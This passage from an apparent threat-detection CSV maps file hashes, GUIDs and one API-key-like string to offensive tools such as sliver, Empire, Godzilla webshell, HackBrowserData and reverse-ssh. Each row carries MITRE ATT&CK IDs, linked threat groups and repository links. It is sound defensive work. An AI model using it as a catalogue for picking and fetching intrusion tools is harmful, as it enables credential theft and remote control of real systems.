"*85a64d925bmsh374c814867fca19p1c3880jsn5cff8c77bdb3*",".{0,1000}85a64d925bmsh374c814867fca19p1c3880jsn5cff8c77bdb3.{0,1000}","offensive_tool_keyword","ShellSync","exposing a server with suspicious scripts and executable from I-Am-Jakoby","T1059.003 - T1100  - T1027","TA0005 - TA0009 - TA0011 ","N/A","N/A","Data Exfiltration","https://github.com/I-Am-Jakoby/ShellSync","1","0","#certificate","N/A","5","1","20","7","2023-11-08T18:01:18Z","2023-11-06T06:05:11Z","30272"
"*85a88db7ae01c7735386630ef780fbabdf465b9b9fb1e30e5ea698b114a33540*",".{0,1000}85a88db7ae01c7735386630ef780fbabdf465b9b9fb1e30e5ea698b114a33540.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","30273"
"*85aaaf71639238e67726b8e50e29efc74bd78dbbd361c38686e19795aebe34a1*",".{0,1000}85aaaf71639238e67726b8e50e29efc74bd78dbbd361c38686e19795aebe34a1.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","30274"
"*85b041052e2b8aba7219fedcf3e54d9df17bb97185862df67b42c76a60d3ba89*",".{0,1000}85b041052e2b8aba7219fedcf3e54d9df17bb97185862df67b42c76a60d3ba89.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","30275"
"*85d455c911c6f67f917c9a9ebb8c42595d5337648d726b9fc0c5b4c94fd628db*",".{0,1000}85d455c911c6f67f917c9a9ebb8c42595d5337648d726b9fc0c5b4c94fd628db.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","30281"
"*85e3e5dbf52f38be79b8ddf3f0de3ae1250584fde316728b96be26b697f36df0*",".{0,1000}85e3e5dbf52f38be79b8ddf3f0de3ae1250584fde316728b96be26b697f36df0.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","0","#filehash","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","30283"
"*85ef86a80dfd91208cf5eaaafd220a584c591ed83c22ee039b31b9849d7428d0*",".{0,1000}85ef86a80dfd91208cf5eaaafd220a584c591ed83c22ee039b31b9849d7428d0.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","30285"
"*85fcc2b2c19bc9355cbe509a9ef3ebe10005f1c8a9887df12a6295f25008d260*",".{0,1000}85fcc2b2c19bc9355cbe509a9ef3ebe10005f1c8a9887df12a6295f25008d260.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30287"
"*86053063d021c510dd6ef09ac6e21ad5f6f6cb7081c53f8d5809a8c10eb562a2*",".{0,1000}86053063d021c510dd6ef09ac6e21ad5f6f6cb7081c53f8d5809a8c10eb562a2.{0,1000}","offensive_tool_keyword","PrivFu","Tool to execute token assigned process","T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","TokenAssignor","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","30288"
"*8613f6bd93b3ef201a4ef71a88d67c78cbbe693f71729eecf58d3ef06306610f*",".{0,1000}8613f6bd93b3ef201a4ef71a88d67c78cbbe693f71729eecf58d3ef06306610f.{0,1000}","offensive_tool_keyword","Eventlogedit-evt--General","Remove individual lines from Windows Event Viewer Log (EVT) files","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evt--General","1","0","#filehash","N/A","9","1","44","9","2021-04-17T01:36:42Z","2018-07-23T01:19:03Z","30289"
"*861c5434860a97737943516d0e93e91f5484c8ea557672763ab55bb8c4bbc979*",".{0,1000}861c5434860a97737943516d0e93e91f5484c8ea557672763ab55bb8c4bbc979.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","30290"
"*862a3fb241e9b9e821a5612e1dd5f7565aefdaee978bef994bc4817d9711409d*",".{0,1000}862a3fb241e9b9e821a5612e1dd5f7565aefdaee978bef994bc4817d9711409d.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","30292"
"*862DA0DA-52E1-47CD-B9C2-46B106031B28*",".{0,1000}862DA0DA\-52E1\-47CD\-B9C2\-46B106031B28.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","30293"
"*862f7ba58bbf77543812637ecc32d277fce062d21bc97587e5816e8fb05634e3*",".{0,1000}862f7ba58bbf77543812637ecc32d277fce062d21bc97587e5816e8fb05634e3.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","#filehash","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","30294"
"*863e5c3db9d52c8af4ad2976dbfe510a8eaaec2affba50a5abd916e440e18804*",".{0,1000}863e5c3db9d52c8af4ad2976dbfe510a8eaaec2affba50a5abd916e440e18804.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","30295"
"*863f8f71cce6acffa596561047c4592087b08a66438bd5500a4053169f31a9ce*",".{0,1000}863f8f71cce6acffa596561047c4592087b08a66438bd5500a4053169f31a9ce.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","30296"
"*863ff084e43b0829de8870f7bfdbc151bb486e491bde6d644ef82acf61709e0e*",".{0,1000}863ff084e43b0829de8870f7bfdbc151bb486e491bde6d644ef82acf61709e0e.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","30297"
"*86445d7ef450ddcb190f14c6f7fc8a1a33945c45*",".{0,1000}86445d7ef450ddcb190f14c6f7fc8a1a33945c45.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","30298"
"*86454256f4e6edb85bf0688e39d1b7acbf8c4f053d77b1e8261610352e8dfdf0*",".{0,1000}86454256f4e6edb85bf0688e39d1b7acbf8c4f053d77b1e8261610352e8dfdf0.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","30299"
"*8648dfc2aff4508e8469d1ed4a7a775b558527bfb0050ba4ed75db259b07943d*",".{0,1000}8648dfc2aff4508e8469d1ed4a7a775b558527bfb0050ba4ed75db259b07943d.{0,1000}","offensive_tool_keyword","TokenTacticsV2","fork of the great TokenTactics with support for CAE and token endpoint v2","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/f-bader/TokenTacticsV2","1","0","#filehash","N/A","6","3","282","38","2025-02-25T14:14:25Z","2022-08-16T17:00:45Z","30300"
"*86492637e46635ef72b4660016c2b3fdbb4c581b5f8dec1b6dc2dd8c04031e93*",".{0,1000}86492637e46635ef72b4660016c2b3fdbb4c581b5f8dec1b6dc2dd8c04031e93.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","30301"
"*86493698c14d838bdef05d96811391a6dc29b9066ee5183f3d1924eff21bda56*",".{0,1000}86493698c14d838bdef05d96811391a6dc29b9066ee5183f3d1924eff21bda56.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","30302"
"*864a9a2d56ee0ff1d01e161fd8a76bb64c354ab435d84701d241800ba460012b*",".{0,1000}864a9a2d56ee0ff1d01e161fd8a76bb64c354ab435d84701d241800ba460012b.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","30303"
"*864d5b274e7600971d3e1cadeecfe4e23eac2db6a284648e7dca7002efc66af1*",".{0,1000}864d5b274e7600971d3e1cadeecfe4e23eac2db6a284648e7dca7002efc66af1.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","30304"
"*864ffadb188961088d28a0b5c5965f88ed9d07ec8f4c2301bd768d2c0cbcfde5*",".{0,1000}864ffadb188961088d28a0b5c5965f88ed9d07ec8f4c2301bd768d2c0cbcfde5.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","30305"
"*86558db784a8bc92ef0e6618e81f7f75809aa39e05bb04baf00688aa8c4470da*",".{0,1000}86558db784a8bc92ef0e6618e81f7f75809aa39e05bb04baf00688aa8c4470da.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","30306"
"*8659af289bd4328901e5ba6e08a8ecead915c02a1d402a154ee3cddd16b65999*",".{0,1000}8659af289bd4328901e5ba6e08a8ecead915c02a1d402a154ee3cddd16b65999.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","30307"
"*865c9da731e9dedc483277985a51af9ef08f736e512447233ac4bec008539443*",".{0,1000}865c9da731e9dedc483277985a51af9ef08f736e512447233ac4bec008539443.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","30309"
"*866e5289337ab033f89bc57c5274c7ca*",".{0,1000}866e5289337ab033f89bc57c5274c7ca.{0,1000}","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","N/A","10","10","1466","204","2024-08-20T17:43:35Z","2022-05-08T04:02:33Z","30310"
"*8672d46e879f704b4b41a401c1a0aae5e6365f18a798a1fbaa4b1a8e711db34b*",".{0,1000}8672d46e879f704b4b41a401c1a0aae5e6365f18a798a1fbaa4b1a8e711db34b.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","0","#filehash #linux","N/A","10","6","552","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z","30311"
"*8675e85e11afabcb4173d5943317f9c92df9148b646ee334c0915be2ce074905*",".{0,1000}8675e85e11afabcb4173d5943317f9c92df9148b646ee334c0915be2ce074905.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","30312"
"*8680150c1ffa19441c8a6594c6f7f89e6ad9867915a37563013e0b987e21f319*",".{0,1000}8680150c1ffa19441c8a6594c6f7f89e6ad9867915a37563013e0b987e21f319.{0,1000}","offensive_tool_keyword","EternalBlack","EternalRomance exploit implemented by Playbit EternalBlack often used by ransomware group like Dispossessor","T1210 - T1489 - T1105 - T1486","TA0001 - TA0002 - TA0009 - TA0040","EternalBlack","Dispossessor ","Exploitation tool","https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/","1","0","#filehash","cve-2019-0708","10","10","N/A","N/A","N/A","N/A","30313"
"*868876b4a458094304af704caecdff99cac8db78f3185db609801ecbd09e3e58*",".{0,1000}868876b4a458094304af704caecdff99cac8db78f3185db609801ecbd09e3e58.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","30314"
"*868A6C76-C903-4A94-96FD-A2C6BA75691C*",".{0,1000}868A6C76\-C903\-4A94\-96FD\-A2C6BA75691C.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#GUIDproject","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","30315"
"*868d0fe76c71f94336e0444d1b4ce6d7bdd2d0c71dcc2befa9ba1a1d3bb6d28f*",".{0,1000}868d0fe76c71f94336e0444d1b4ce6d7bdd2d0c71dcc2befa9ba1a1d3bb6d28f.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","30316"
"*8691d8707e22f82e78e2bb5b6c5d8d600c9b0ce70bae4e3cb0b26acfde08cd62*",".{0,1000}8691d8707e22f82e78e2bb5b6c5d8d600c9b0ce70bae4e3cb0b26acfde08cd62.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","30319"
"*86943e3a790e194a2f76aa2c4ed2832e19fe4e7a45eeebe5f5bc62fd16825bd5*",".{0,1000}86943e3a790e194a2f76aa2c4ed2832e19fe4e7a45eeebe5f5bc62fd16825bd5.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","30320"
"*8694c7e87215c274f09116eb2f13cd23cf847abc46a25977088873b0d353c368*",".{0,1000}8694c7e87215c274f09116eb2f13cd23cf847abc46a25977088873b0d353c368.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","30321"
"*8694c7e87215c274f09116eb2f13cd23cf847abc46a25977088873b0d353c368*",".{0,1000}8694c7e87215c274f09116eb2f13cd23cf847abc46a25977088873b0d353c368.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","#filehash","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","30322"
"*869618deb6029b6b9825dc2d8e07655476e1673bbf3ff82f54837557055a18b1*",".{0,1000}869618deb6029b6b9825dc2d8e07655476e1673bbf3ff82f54837557055a18b1.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","30323"
"*86965e72a87bd5b0fc8a897c6736b7a57ddd9d3ba5232a5ba626e3f16fec59e2*",".{0,1000}86965e72a87bd5b0fc8a897c6736b7a57ddd9d3ba5232a5ba626e3f16fec59e2.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","30324"
"*869e5207ba18cdc96d8d3ea5e90c7cf02611804929e416c1622c6072ebcc93a6*",".{0,1000}869e5207ba18cdc96d8d3ea5e90c7cf02611804929e416c1622c6072ebcc93a6.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","30326"
"*86b4924004cdef5e49cdc9ca7cbd2d8be156b8e8f41eceee92492cc315103eb8*",".{0,1000}86b4924004cdef5e49cdc9ca7cbd2d8be156b8e8f41eceee92492cc315103eb8.{0,1000}","offensive_tool_keyword","JuicyPotato","Windows Local Privilege Escalation from Service Account to System","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/uknowsec/JuicyPotato","1","0","#filehash","N/A","10","2","190","46","2021-07-01T05:28:41Z","2021-06-10T12:06:13Z","30328"
"*86b62609337b5c5c46a2f007f4b5126679728016c0095938646365d495c80a39*",".{0,1000}86b62609337b5c5c46a2f007f4b5126679728016c0095938646365d495c80a39.{0,1000}","offensive_tool_keyword","ShellSync","exposing a server with suspicious scripts and executable from I-Am-Jakoby","T1059.003 - T1100  - T1027","TA0005 - TA0009 - TA0011 ","N/A","N/A","Data Exfiltration","https://github.com/I-Am-Jakoby/ShellSync","1","0","#filehash","N/A","5","1","20","7","2023-11-08T18:01:18Z","2023-11-06T06:05:11Z","30329"
